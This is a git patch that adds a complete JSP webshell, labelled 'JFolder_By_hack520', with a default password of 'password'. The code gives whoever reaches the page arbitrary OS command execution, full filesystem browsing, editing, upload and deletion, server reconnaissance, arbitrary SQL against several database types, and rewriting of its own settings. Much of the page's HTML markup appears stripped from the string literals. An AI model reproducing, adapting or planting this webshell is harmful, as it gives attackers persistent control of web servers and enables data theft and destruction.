From c94962d51af5f7fd28d4b4e9deb9c184792a0c73 Mon Sep 17 00:00:00 2001 From: tennc Date: Mon, 30 Nov 2015 22:50:17 +0800 Subject: [PATCH] Create dy.jsp --- jsp/dy.jsp | 1811 ++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 1811 insertions(+) create mode 100644 jsp/dy.jsp diff --git a/jsp/dy.jsp b/jsp/dy.jsp new file mode 100644 index 0000000..c5c99b2 --- /dev/null +++ b/jsp/dy.jsp @@ -0,0 +1,1811 @@ +<%@ page contentType="text/html; charset=GBK" %> +<%@ page import="java.io.*"%> +<%@ page import="java.util.Map"%> +<%@ page import="java.util.HashMap"%> +<%@ page import="java.nio.charset.Charset"%> +<%@ page import="java.util.regex.*"%> +<%@ page import="java.sql.*"%> +<%! +private String _password = "password"; +private String _encodeType = "GB2312"; +private int _sessionOutTime = 20; +private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp", "java", "js", "css", "c", "cpp", "sh", "pl", "cgi", "php", "conf", "xml", "xsl", "ini", "vbs", "inc"}; +private Connection _dbConnection = null; +private Statement _dbStatement = null; +private String _url = null; + +public boolean validate(String password) { + if (password.equals(_password)) { + return true; + } else { + return false; + } +} + +public String HTMLEncode(String str) { + str = str.replaceAll(" ", " "); + str = str.replaceAll("<", "<"); + str = str.replaceAll(">", ">"); + str = str.replaceAll("\r\n", "
"); + + return str; +} + +public String Unicode2GB(String str) { + String sRet = null; + + try { + sRet = new String(str.getBytes("ISO8859_1"), _encodeType); + } catch (Exception e) { + sRet = str; + } + + return sRet; +} + +public String exeCmd(String cmd) { + Runtime runtime = Runtime.getRuntime(); + Process proc = null; + String retStr = ""; + InputStreamReader insReader = null; + char[] tmpBuffer = new char[1024]; + int nRet = 0; + + try { + proc = runtime.exec(cmd); + insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312")); + + while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) { + retStr += new String(tmpBuffer, 0, nRet); + } + + insReader.close(); + retStr = HTMLEncode(retStr); + } catch (Exception e) { + retStr = "bad command \"" + cmd + "\""; + } finally { + return retStr; + } +} + +public String pathConvert(String path) { + String sRet = path.replace('\\', '/'); + File file = new File(path); + + if (file.getParent() != null) { + if (file.isDirectory()) { + if (! sRet.endsWith("/")) + sRet += "/"; + } + } else { + if (! sRet.endsWith("/")) + sRet += "/"; + } + + return sRet; +} + +public String strCut(String str, int len) { + String sRet; + + len -= 3; + + if (str.getBytes().length <= len) { + sRet = str; + } else { + try { + sRet = (new String(str.getBytes(), 0, len, "GBK")) + "..."; + } catch (Exception e) { + sRet = str; + } + } + + return sRet; +} + +public String listFiles(String path, String curUri) { + File[] files = null; + File curFile = null; + String sRet = null; + int n = 0; + boolean isRoot = path.equals(""); + + path = pathConvert(path); + + try { + if (isRoot) { + files = File.listRoots(); + } else { + try { + curFile = new File(path); + String[] sFiles = curFile.list(); + files = new File[sFiles.length]; + + for (n = 0; n < sFiles.length; n ++) { + files[n] = new File(path + sFiles[n]); + } + } catch (Exception e) { + sRet = "bad path \"" + path + "\""; + } + } + + if (sRet == null) { + sRet = "\n"; + sRet += "\n"; + sRet += "\n"; + sRet += " \n"; + + if (curFile != null) { + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + } + + sRet += "\n"; + + sRet += " \n"; + + for (n = 0; n < files.length; n ++) { + sRet += " \n"; + + if (! isRoot) { + sRet += " \n"; + if (files[n].isDirectory()) { + sRet += " \n"; + } else { + sRet += " \n"; + } + + sRet += " \n"; + sRet += " \n"; + } else { + sRet += " \n"; + } + + sRet += " \n"; + } + sRet += " \n"; + sRet += "
\n"; + sRet += "  上级目录 "; + sRet += "创建目录 "; + sRet += "新建文件 "; + sRet += "删除 "; + sRet += "复制 "; + sRet += "重命名 "; + sRet += "上传文件\n"; + sRet += " \n"; + sRet += "
<" + strCut(files[n].getName(), 50) + ">" + strCut(files[n].getName(), 50) + "" + (files[n].isDirectory() ? "<dir>" : "") + ((! files[n].isDirectory()) && isTextFile(getExtName(files[n].getPath())) ? "<edit>" : "") + "" + files[n].length() + "" + pathConvert(files[n].getPath()) + "
\n"; + } + } catch (SecurityException e) { + sRet = "security violation, no privilege."; + } + + return sRet; +} + +public boolean isTextFile(String extName) { + int i; + boolean bRet = false; + + if (! extName.equals("")) { + for (i = 0; i < _textFileTypes.length; i ++) { + if (extName.equals(_textFileTypes[i])) { + bRet = true; + break; + } + } + } else { + bRet = true; + } + + return bRet; +} + +public String getExtName(String fileName) { + String sRet = ""; + int nLastDotPos; + + fileName = pathConvert(fileName); + + nLastDotPos = fileName.lastIndexOf("."); + + if (nLastDotPos == -1) { + sRet = ""; + } else { + sRet = fileName.substring(nLastDotPos + 1); + } + + return sRet; +} + +public String browseFile(String path) { + String sRet = ""; + File file = null; + FileReader fileReader = null; + + path = pathConvert(path); + + try { + file = new File(path); + fileReader = new FileReader(file); + String fileString = ""; + char[] chBuffer = new char[1024]; + int ret; + + sRet = "\n"; + + } catch (IOException e) { + sRet += "\n"; + } + + return sRet; +} + +public String openFile(String path, String curUri) { + String sRet = ""; + boolean canOpen = false; + int nLastDotPos = path.lastIndexOf("."); + String extName = ""; + String fileString = null; + File curFile = null; + + path = pathConvert(path); + + if (nLastDotPos == -1) { + canOpen = true; + } else { + extName = path.substring(nLastDotPos + 1); + canOpen = isTextFile(extName); + } + + if (canOpen) { + try { + fileString = ""; + curFile = new File(path); + FileReader fileReader = new FileReader(curFile); + char[] chBuffer = new char[1024]; + int nRet; + + while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) { + fileString += new String(chBuffer, 0, nRet); + } + + fileReader.close(); + } catch (IOException e) { + fileString = null; + sRet = "不能打开文件\"" + path + "\""; + } catch (SecurityException e) { + fileString = null; + sRet = "安全问题,没有权限执行该操作"; + } + } else { + sRet = "file \"" + path + "\" is not a text file, can't be opened in text mode"; + } + + if (fileString != null) { + sRet += "\n"; + sRet += "\n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += "
[上级目录]
\n"; + sRet += " \n"; + sRet += "
 
\n"; + } + + return sRet; +} + +public String saveFile(String path, String curUri, String fileContent) { + String sRet = ""; + File file = null; + + path = pathConvert(path); + + try { + file = new File(path); + + if (! file.canWrite()) { + sRet = "文件不可写"; + } else { + FileWriter fileWriter = new FileWriter(file); + fileWriter.write(fileContent); + + fileWriter.close(); + sRet = "文件保存成功,正在返回,请稍候……\n"; + sRet += "\n"; + } + } catch (IOException e) { + sRet = "保存文件失败"; + } catch (SecurityException e) { + sRet = "安全问题,没有权限执行该操作"; + } + + return sRet; +} + +public String createFolder(String path, String curUri, String folderName) { + String sRet = ""; + File folder = null; + + path = pathConvert(path); + + try { + folder = new File(path + folderName); + + if (folder.exists() && folder.isDirectory()) { + sRet = "\"" + path + folderName + "\"目录已经存在"; + } else { + if (folder.mkdir()) { + sRet = "成功创建目录\"" + pathConvert(folder.getPath()) + "\",正在返回,请稍候……\n"; + sRet += ""; + } else { + sRet = "创建目录\"" + folderName + "\"失败"; + } + } + } catch (SecurityException e) { + sRet = "安全问题,没有权限执行该操作"; + } + + return sRet; +} + +public String createFile(String path, String curUri, String fileName) { + String sRet = ""; + File file = null; + + path = pathConvert(path); + + try { + file = new File(path + fileName); + + if (file.createNewFile()) { + sRet = ""; + } else { + sRet = "\"" + path + fileName + "\"文件已经存在"; + } + } catch (SecurityException e) { + sRet = "安全问题,没有权限执行该操作"; + } catch (IOException e) { + sRet = "创建文件\"" + path + fileName + "\"失败"; + } + + return sRet; +} + +public String deleteFile(String path, String curUri, String[] files2Delete) { + String sRet = ""; + File tmpFile = null; + + try { + for (int i = 0; i < files2Delete.length; i ++) { + tmpFile = new File(files2Delete[i]); + if (! tmpFile.delete()) { + sRet += "删除\"" + files2Delete[i] + "\"失败
\n"; + } + } + + if (sRet.equals("")) { + sRet = "删除成功,正在返回,请稍候……\n"; + sRet += ""; + } + } catch (SecurityException e) { + sRet = "安全问题,没有权限执行该操作\n"; + } + + return sRet; +} + +public String saveAs(String path, String curUri, String fileContent) { + String sRet = ""; + File file = null; + FileWriter fileWriter = null; + + try { + file = new File(path); + + if (file.createNewFile()) { + fileWriter = new FileWriter(file); + fileWriter.write(fileContent); + fileWriter.close(); + + sRet = ""; + } else { + sRet = "文件\"" + path + "\"已经存在"; + } + } catch (IOException e) { + sRet = "创建文件\"" + path + "\"失败"; + } + + return sRet; +} + + +public String uploadFile(ServletRequest request, String path, String curUri) { + String sRet = ""; + File file = null; + InputStream in = null; + + path = pathConvert(path); + + try { + in = request.getInputStream(); + + byte[] inBytes = new byte[request.getContentLength()]; + int nBytes; + int start = 0; + int end = 0; + int size = 1024; + String token = null; + String filePath = null; + + // + // 把输入流读入一个字节数组 + // + while ((nBytes = in.read(inBytes, start, size)) != -1) { + start += nBytes; + } + + in.close(); + // + // 从字节数组中得到文件分隔符号 + // + int i = 0; + byte[] seperator; + + while (inBytes[i] != 13) { + i ++; + } + + seperator = new byte[i]; + + for (i = 0; i < seperator.length; i ++) { + seperator[i] = inBytes[i]; + } + + // + // 得到Header部分 + // + String dataHeader = null; + i += 3; + start = i; + while (! (inBytes[i] == 13 && inBytes[i + 2] == 13)) { + i ++; + } + end = i - 1; + dataHeader = new String(inBytes, start, end - start + 1); + + // + // 得到文件名 + // + token = "filename=\""; + start = dataHeader.indexOf(token) + token.length(); + token = "\""; + end = dataHeader.indexOf(token, start) - 1; + filePath = dataHeader.substring(start, end + 1); + filePath = pathConvert(filePath); + String fileName = filePath.substring(filePath.lastIndexOf("/") + 1); + + // + // 得到文件内容开始位置 + // + i += 4; + start = i; + + /* + boolean found = true; + byte[] tmp = new byte[seperator.length]; + while (i <= inBytes.length - 1 - seperator.length) { + + for (int j = i; j < i + seperator.length; j ++) { + if (seperator[j - i] != inBytes[j]) { + found = false; + break; + } else + tmp[j - i] = inBytes[j]; + } + + if (found) + break; + + i ++; + }*/ + + // + // 偷懒的办法 + // + end = inBytes.length - 1 - 2 - seperator.length - 2 - 2; + + // + // 保存为文件 + // + File newFile = new File(path + fileName); + newFile.createNewFile(); + FileOutputStream out = new FileOutputStream(newFile); + + //out.write(inBytes, start, end - start + 1); + out.write(inBytes, start, end - start + 1); + out.close(); + + sRet = "\n"; + } catch (IOException e) { + sRet = "\n"; + } + + sRet += ""; + return sRet; +} + +public boolean fileCopy(String srcPath, String dstPath) { + boolean bRet = true; + + try { + FileInputStream in = new FileInputStream(new File(srcPath)); + FileOutputStream out = new FileOutputStream(new File(dstPath)); + byte[] buffer = new byte[1024]; + int nBytes; + + + while ((nBytes = in.read(buffer, 0, 1024)) != -1) { + out.write(buffer, 0, nBytes); + } + + in.close(); + out.close(); + } catch (IOException e) { + bRet = false; + } + + return bRet; +} + +public String getFileNameByPath(String path) { + String sRet = ""; + + path = pathConvert(path); + + if (path.lastIndexOf("/") != -1) { + sRet = path.substring(path.lastIndexOf("/") + 1); + } else { + sRet = path; + } + + return sRet; +} + +public String copyFiles(String path, String curUri, String[] files2Copy, String dstPath) { + String sRet = ""; + int i; + + path = pathConvert(path); + dstPath = pathConvert(dstPath); + + for (i = 0; i < files2Copy.length; i ++) { + if (! fileCopy(files2Copy[i], dstPath + getFileNameByPath(files2Copy[i]))) { + sRet += "文件\"" + files2Copy[i] + "\"复制失败
"; + } + } + + if (sRet.equals("")) { + sRet = "文件复制成功,正在返回,请稍候……"; + sRet += ""; + } + + return sRet; +} + +public boolean isFileName(String fileName) { + boolean bRet = false; + + Pattern p = Pattern.compile("^[a-zA-Z0-9][\\w\\.]*[\\w]$"); + Matcher m = p.matcher(fileName); + + bRet = m.matches(); + + return bRet; +} + +public String renameFile(String path, String curUri, String file2Rename, String newName) { + String sRet = ""; + + path = pathConvert(path); + file2Rename = pathConvert(file2Rename); + + try { + File file = new File(file2Rename); + + newName = file2Rename.substring(0, file2Rename.lastIndexOf("/") + 1) + newName; + File newFile = new File(newName); + + if (! file.exists()) { + sRet = "文件\"" + file2Rename + "\"不存在"; + } else { + file.renameTo(newFile); + sRet = "文件重命名成功,正在返回,请稍候……"; + sRet += ""; + } + } catch (SecurityException e) { + sRet = "安全问题导致文件\"" + file2Rename + "\"复制失败"; + } + + return sRet; +} + +public boolean DBInit(String dbType, String dbServer, String dbPort, String dbUsername, String dbPassword, String dbName) { + boolean bRet = true; + String driverName = ""; + + if (dbServer.equals("")) + dbServer = "localhost"; + + try { + if (dbType.equals("sqlserver")) { + driverName = "com.microsoft.jdbc.sqlserver.SQLServerDriver"; + if (dbPort.equals("")) + dbPort = "1433"; + _url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName; + } else if (dbType.equals("mysql")) { + driverName = "com.mysql.jdbc.Driver"; + if (dbPort.equals("")) + dbPort = "3306"; + _url = "jdbc:mysql://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName; + } else if (dbType.equals("odbc")) { + driverName = "sun.jdbc.odbc.JdbcOdbcDriver"; + _url = "jdbc:odbc:dsn=" + dbName + ";User=" + dbUsername + ";Password=" + dbPassword; + } else if (dbType.equals("oracle")) { + driverName = "oracle.jdbc.driver.OracleDriver"; + _url = "jdbc:oracle:thin@" + dbServer + ":" + dbPort + ":" + dbName; + } else if (dbType.equals("db2")) { + driverName = "com.ibm.db2.jdbc.app.DB2Driver"; + _url = "jdbc:db2://" + dbServer + ":" + dbPort + "/" + dbName; + } + + Class.forName(driverName); + } catch (ClassNotFoundException e) { + bRet = false; + } + + return bRet; +} + +public boolean DBConnect(String User, String Password) { + boolean bRet = false; + + if (_url != null) { + try { + _dbConnection = DriverManager.getConnection(_url, User, Password); + _dbStatement = _dbConnection.createStatement(); + bRet = true; + } catch (SQLException e) { + bRet = false; + } + } + + return bRet; +} + +public String DBExecute(String sql) { + String sRet = ""; + + if (_dbConnection == null || _dbStatement == null) { + sRet = "数据库没有正常连接"; + } else { + try { + if (sql.toLowerCase().substring(0, 6).equals("select")) { + ResultSet rs = _dbStatement.executeQuery(sql); + ResultSetMetaData rsmd = rs.getMetaData(); + int colNum = rsmd.getColumnCount(); + int colType; + + sRet = "sql语句执行成功,返回结果
\n"; + sRet += "\n"; + sRet += " \n"; + for (int i = 1; i <= colNum; i ++) { + sRet += " \n"; + } + sRet += " \n"; + while (rs.next()) { + sRet += " \n"; + for (int i = 1; i <= colNum; i ++) { + colType = rsmd.getColumnType(i); + + sRet += " \n"; + } + sRet += " \n"; + } + sRet += "
" + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ")
"; + switch (colType) { + case Types.BIGINT: + sRet += rs.getLong(i); + break; + + case Types.BIT: + sRet += rs.getBoolean(i); + break; + + case Types.BOOLEAN: + sRet += rs.getBoolean(i); + break; + + case Types.CHAR: + sRet += rs.getString(i); + break; + + case Types.DATE: + sRet += rs.getDate(i).toString(); + break; + + case Types.DECIMAL: + sRet += rs.getDouble(i); + break; + + case Types.NUMERIC: + sRet += rs.getDouble(i); + break; + + case Types.REAL: + sRet += rs.getDouble(i); + break; + + case Types.DOUBLE: + sRet += rs.getDouble(i); + break; + + case Types.FLOAT: + sRet += rs.getFloat(i); + break; + + case Types.INTEGER: + sRet += rs.getInt(i); + break; + + case Types.TINYINT: + sRet += rs.getShort(i); + break; + + case Types.VARCHAR: + sRet += rs.getString(i); + break; + + case Types.TIME: + sRet += rs.getTime(i).toString(); + break; + + case Types.DATALINK: + sRet += rs.getTimestamp(i).toString(); + break; + } + sRet += "
\n"; + + rs.close(); + } else { + if (_dbStatement.execute(sql)) { + sRet = "sql语句执行成功"; + } else { + sRet = "sql语句执行失败"; + } + } + } catch (SQLException e) { + sRet = "sql语句执行失败"; + } + } + + return sRet; +} + +public void DBRelease() { + try { + if (_dbStatement != null) { + _dbStatement.close(); + _dbStatement = null; + } + + if (_dbConnection != null) { + _dbConnection.close(); + _dbConnection = null; + } + } catch (SQLException e) { + + } +} + +///////////////////////////////////////////////////////////////////////////////////////////////////////////////// + +class JshellConfig { + private String _jshellContent = null; + private String _path = null; + + public JshellConfig(String path) throws JshellConfigException { + _path = path; + read(); + } + + private void read() throws JshellConfigException { + try { + FileReader jshell = new FileReader(new File(_path)); + char[] buffer = new char[1024]; + int nChars; + _jshellContent = ""; + + while ((nChars = jshell.read(buffer, 0, 1024)) != -1) { + _jshellContent += new String(buffer, 0, nChars); + } + + jshell.close(); + } catch (IOException e) { + throw new JshellConfigException("打开文件失败"); + } + } + + public void save() throws JshellConfigException { + FileWriter jshell = null; + + try { + jshell = new FileWriter(new File(_path)); + char[] buffer = _jshellContent.toCharArray(); + int start = 0; + int size = 1024; + + for (start = 0; start < buffer.length - 1 - size; start += size) { + jshell.write(buffer, start, size); + } + + jshell.write(buffer, start, buffer.length - 1 - start); + } catch (IOException e) { + new JshellConfigException("写文件失败"); + } finally { + try { + jshell.close(); + } catch (IOException e) { + + } + } + } + + public void setPassword(String password) throws JshellConfigException { + Pattern p = Pattern.compile("\\w+"); + Matcher m = p.matcher(password); + + if (! m.matches()) { + throw new JshellConfigException("密码不能有除字母数字下划线以外的字符"); + } + + p = Pattern.compile("private\\sString\\s_password\\s=\\s\"" + _password + "\""); + m = p.matcher(_jshellContent); + if (! m.find()) { + throw new JshellConfigException("程序体已经被非法修改"); + } + + _jshellContent = m.replaceAll("private String _password = \"" + password + "\""); + + //return HTMLEncode(_jshellContent); + } + + public void setEncodeType(String encodeType) throws JshellConfigException { + Pattern p = Pattern.compile("[A-Za-z0-9]+"); + Matcher m = p.matcher(encodeType); + + if (! m.matches()) { + throw new JshellConfigException("编码格式只能是字母和数字的组合"); + } + + p = Pattern.compile("private\\sString\\s_encodeType\\s=\\s\"" + _encodeType + "\""); + m = p.matcher(_jshellContent); + + if (! m.find()) { + throw new JshellConfigException("程序体已经被非法修改"); + } + + _jshellContent = m.replaceAll("private String _encodeType = \"" + encodeType + "\""); + //return HTMLEncode(_jshellContent); + } + + public void setSessionTime(String sessionTime) throws JshellConfigException { + Pattern p = Pattern.compile("\\d+"); + Matcher m = p.matcher(sessionTime); + + if (! m.matches()) { + throw new JshellConfigException("session超时时间只能填数字"); + } + + p = Pattern.compile("private\\sint\\s_sessionOutTime\\s=\\s" + _sessionOutTime); + m = p.matcher(_jshellContent); + + if (! m.find()) { + throw new JshellConfigException("程序体已经被非法修改"); + } + + _jshellContent = m.replaceAll("private int _sessionOutTime = " + sessionTime); + //return HTMLEncode(_jshellContent); + } + + public void setTextFileTypes(String[] textFileTypes) throws JshellConfigException { + Pattern p = Pattern.compile("\\w+"); + Matcher m = null; + int i; + String fileTypes = ""; + String tmpFileTypes = ""; + + for (i = 0; i < textFileTypes.length; i ++) { + m = p.matcher(textFileTypes[i]); + + if (! m.matches()) { + throw new JshellConfigException("扩展名只能是字母数字和下划线的组合"); + } + + if (i != textFileTypes.length - 1) + fileTypes += "\"" + textFileTypes[i] + "\"" + ", "; + else + fileTypes += "\"" + textFileTypes[i] + "\""; + } + + for (i = 0; i < _textFileTypes.length; i ++) { + if (i != _textFileTypes.length - 1) + tmpFileTypes += "\"" + _textFileTypes[i] + "\"" + ", "; + else + tmpFileTypes += "\"" + _textFileTypes[i] + "\""; + } + + p = Pattern.compile(tmpFileTypes); + m = p.matcher(_jshellContent); + + if (! m.find()) { + throw new JshellConfigException("程序文件已经被非法修改"); + } + + _jshellContent = m.replaceAll(fileTypes); + + //return HTMLEncode(_jshellContent); + } + + public String getContent() { + return HTMLEncode(_jshellContent); + } +} + +class JshellConfigException extends Exception { + public JshellConfigException(String message) { + super(message); + } +} +%> + + +测试 + + + + +<% +session.setMaxInactiveInterval(_sessionOutTime * 60); + +if (request.getParameter("password") == null && session.getAttribute("password") == null) { +// show the login form +//================================================================================================ +%> +
+ + + + +
+ + + + + + + + + + + + + + + +
8管理登录 :::...JFolder_By_hack520
+ + +
+
+<% +//================================================================================================ +// end of the login form +} else { + String password = null; + + if (session.getAttribute("password") == null) { + password = (String)request.getParameter("password"); + + if (validate(password) == false) { + out.println("
  • 哎呀,倒霉死啦!
    • "); + out.close(); + return; + } + + session.setAttribute("password", password); + } else { + password = (String)session.getAttribute("password"); + } + + String action = null; + + + if (request.getParameter("action") == null) + action = "main"; + else + action = (String)request.getParameter("action"); + + if (action.equals("exit")) { + session.removeAttribute("password"); + response.sendRedirect(request.getRequestURI()); + out.close(); + return; + } + +// show the main menu +//==================================================================================== +%> + + + + + + + +
    + + +
    +<% +//===================================================================================== +// end of main menu + + if (action.equals("main")) { +// print the system info table +//======================================================================================= +%> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    服务器信息
    服务器名<%=request.getServerName()%>
    服务器端口<%=request.getServerPort()%>
    操作系统<%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " " + System.getProperty("os.arch")%>
    当前用户名<%=System.getProperty("user.name")%>
    当前用户目录<%=System.getProperty("user.home")%>
    当前用户工作目录<%=System.getProperty("user.dir")%>
    程序相对路径<%=request.getRequestURI()%>
    程序绝对路径<%=request.getRealPath(request.getServletPath())%>
    网络协议<%=request.getProtocol()%>
    服务器软件版本信息<%=application.getServerInfo()%>
    JDK版本<%=System.getProperty("java.version")%>
    JDK安装路径<%=System.getProperty("java.home")%>
    JAVA虚拟机版本<%=System.getProperty("java.vm.specification.version")%>
    JAVA虚拟机名<%=System.getProperty("java.vm.name")%>
    JAVA类路径<%=System.getProperty("java.class.path")%>
    JAVA载入库搜索路径<%=System.getProperty("java.library.path")%>
    JAVA临时目录<%=System.getProperty("java.io.tmpdir")%>
    JIT编译器名<%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%>
    扩展目录路径<%=System.getProperty("java.ext.dirs")%>
    客户端信息
    客户机地址<%=request.getRemoteAddr()%>
    服务机器名<%=request.getRemoteHost()%>
    用户名<%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%>
    请求方式<%=request.getScheme()%>
    应用安全套接字层<%=request.isSecure() == true ? "是" : "否"%>
    +<% +//======================================================================================= +// end of printing the system info table +///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("filesystem")) { + String curPath = ""; + String result = ""; + String fsAction = ""; + + if (request.getParameter("curPath") == null) { + curPath = request.getRealPath(request.getServletPath()); + curPath = pathConvert((new File(curPath)).getParent()); + } else { + curPath = Unicode2GB((String)request.getParameter("curPath")); + } + + if (request.getParameter("fsAction") == null) { + fsAction = "list"; + } else { + fsAction = (String)request.getParameter("fsAction"); + } + + if (fsAction.equals("list")) + result = listFiles(curPath, request.getRequestURI() + "?action=" + action); + else if (fsAction.equals("browse")) { + result = listFiles(new File(curPath).getParent(), request.getRequestURI() + "?action=" + action); + result += browseFile(curPath); + } + else if (fsAction.equals("open")) + result = openFile(curPath, request.getRequestURI() + "?action=" + action); + else if (fsAction.equals("save")) { + if (request.getParameter("fileContent") == null) { + result = "页面导航错误"; + } else { + String fileContent = Unicode2GB((String)request.getParameter("fileContent")); + result = saveFile(curPath, request.getRequestURI() + "?action=" + action, fileContent); + } + } else if (fsAction.equals("createFolder")) { + if (request.getParameter("folderName") == null) { + result = "目录名不能为空"; + } else { + String folderName = Unicode2GB(request.getParameter("folderName").trim()); + if (folderName.equals("")) { + result = "目录名不能为空"; + } else { + result = createFolder(curPath, request.getRequestURI() + "?action=" + action, folderName); + } + } + } else if (fsAction.equals("createFile")) { + if (request.getParameter("fileName") == null) { + result = "文件名不能为空"; + } else { + String fileName = Unicode2GB(request.getParameter("fileName").trim()); + if (fileName.equals("")) { + result = "文件名不能为空"; + } else { + result = createFile(curPath, request.getRequestURI() + "?action=" + action, fileName); + } + } + } else if (fsAction.equals("deleteFile")) { + if (request.getParameter("filesDelete") == null) { + result = "没有选择要删除的文件"; + } else { + String[] files2Delete = (String[])request.getParameterValues("filesDelete"); + if (files2Delete.length == 0) { + result = "没有选择要删除的文件"; + } else { + for (int n = 0; n < files2Delete.length; n ++) { + files2Delete[n] = Unicode2GB(files2Delete[n]); + } + result = deleteFile(curPath, request.getRequestURI() + "?action=" + action, files2Delete); + } + } + } else if (fsAction.equals("saveAs")) { + if (request.getParameter("fileContent") == null) { + result = "页面导航错误"; + } else { + String fileContent = Unicode2GB(request.getParameter("fileContent")); + result = saveAs(curPath, request.getRequestURI() + "?action=" + action, fileContent); + } + } else if (fsAction.equals("upload")) { + result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action); + } else if (fsAction.equals("copyto")) { + if (request.getParameter("filesDelete") == null || request.getParameter("dstPath") == null) { + result = "没有选择要复制的文件"; + } else { + String[] files2Copy = request.getParameterValues("filesDelete"); + String dstPath = request.getParameter("dstPath").trim(); + if (files2Copy.length == 0) { + result = "没有选择要复制的文件"; + } else if (dstPath.equals("")) { + result = "没有填写要复制到的目录路径"; + } else { + for (int i = 0; i < files2Copy.length; i ++) + files2Copy[i] = Unicode2GB(files2Copy[i]); + + result = copyFiles(curPath, request.getRequestURI() + "?action=" + action, files2Copy, Unicode2GB(dstPath)); + } + } + } else if (fsAction.equals("rename")) { + if (request.getParameter("fileRename") == null) { + result = "页面导航错误"; + } else { + String file2Rename = request.getParameter("fileRename").trim(); + String newName = request.getParameter("newName").trim(); + if (file2Rename.equals("")) { + result = "没有选择要重命名的文件"; + } else if (newName.equals("")) { + result = "没有填写新文件名"; + } else { + result = renameFile(curPath, request.getRequestURI() + "?action=" + action, Unicode2GB(file2Rename), Unicode2GB(newName)); + } + } + } +%> + + + + + + + + + +
    地址 +
    <%= result.trim().equals("")?" " : result%>
    +<% +///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("command")) { + String cmd = ""; + InputStream ins = null; + String result = ""; + + if (request.getParameter("command") != null) { + cmd = (String)request.getParameter("command"); + result = exeCmd(cmd); + } +// print the command form +//======================================================================================== +%> + + + + + + + + + + + + +
    执行命令
    + + +
    执行结果
    + + + + +
    <%=result == "" ? " " : result%>
    +<% +//========================================================================================= +// end of printing command form +/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("database")) { + String dbAction = ""; + String result = ""; + String dbType = ""; + String dbServer = ""; + String dbPort = ""; + String dbUsername = ""; + String dbPassword = ""; + String dbName = ""; + String dbResult = ""; + String sql = ""; + + if (request.getParameter("dbAction") == null) { + dbAction = "main"; + } else { + dbAction = request.getParameter("dbAction").trim(); + if (dbAction.equals("")) + dbAction = "main"; + } + + if (dbAction.equals("main")) { + result = " "; + } else if (dbAction.equals("dbConnect")) { + if (request.getParameter("dbType") == null || + request.getParameter("dbServer") == null || + request.getParameter("dbPort") == null || + request.getParameter("dbUsername") == null || + request.getParameter("dbPassword") == null || + request.getParameter("dbName") == null) { + response.sendRedirect(request.getRequestURI() + "?action=" + action); + } else { + dbType = request.getParameter("dbType").trim(); + dbServer = request.getParameter("dbServer").trim(); + dbPort = request.getParameter("dbPort").trim(); + dbUsername = request.getParameter("dbUsername").trim(); + dbPassword = request.getParameter("dbPassword").trim(); + dbName = request.getParameter("dbName").trim(); + + if (DBInit(dbType, dbServer, dbPort, dbUsername, dbPassword, dbName)) { + if (DBConnect(dbUsername, dbPassword)) { + if (request.getParameter("sql") != null) { + sql = request.getParameter("sql").trim(); + if (! sql.equals("")) { + dbResult = DBExecute(sql); + } + } + + result = "\n"; + result += "sql语句

     \n"; + + DBRelease(); + } else { + result = "数据库连接失败"; + } + } else { + result = "数据库连接驱动没有找到"; + } + } + } +%> + + + "> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    数据库连接类型 + + +
    数据库服务器地址
    数据库服务器端口
    数据库用户名
    数据库密码
    数据库名
    <%=result%>
    + + + + +
    + <%=dbResult%> +
    +<% + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("config")) { + String cfAction = ""; + int i; + + if (request.getParameter("cfAction") == null) { + + cfAction = "main"; + } else { + cfAction = request.getParameter("cfAction").trim(); + if (cfAction.equals("")) + cfAction = "main"; + } + + if (cfAction.equals("main")) { +// start of config form +//========================================================================================== +%> + + + " onSubmit="javascript:selectAllTypes()"> + + + + + + + + + + + + + + + + + + + + +
    密码
    系统编码
    Session超时时间
    可编辑文件类型 + + + + + + +
    + + + +

    + +     		+ +
    +
    +<% + } else if (cfAction.equals("save")) { + if (request.getParameter("password") == null || + request.getParameter("encode") == null || + request.getParameter("sessionTime") == null || + request.getParameterValues("textFileTypes") == null) { + response.sendRedirect(request.getRequestURI()); + } + + String result = ""; + + String newPassword = request.getParameter("password").trim(); + String newEncodeType = request.getParameter("encode").trim(); + String newSessionTime = request.getParameter("sessionTime").trim(); + String[] newTextFileTypes = request.getParameterValues("textFileTypes"); + String jshellPath = request.getRealPath(request.getServletPath()); + + try { + JshellConfig jconfig = new JshellConfig(jshellPath); + jconfig.setPassword(newPassword); + jconfig.setEncodeType(newEncodeType); + jconfig.setSessionTime(newSessionTime); + jconfig.setTextFileTypes(newTextFileTypes); + jconfig.save(); + result += "设置保存成功,正在返回,请稍候……"; + result += ""; + } catch (JshellConfigException e) { + result = "" + e.getMessage() + ""; + } + +%> + + + + +
    <%=result == "" ? " " : result%>
    +<% + } +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +//========================================================================================== +// end of config form + } else if (action.equals("about")) { +// start of about +//========================================================================================== +%> + + + + + + + + + + +
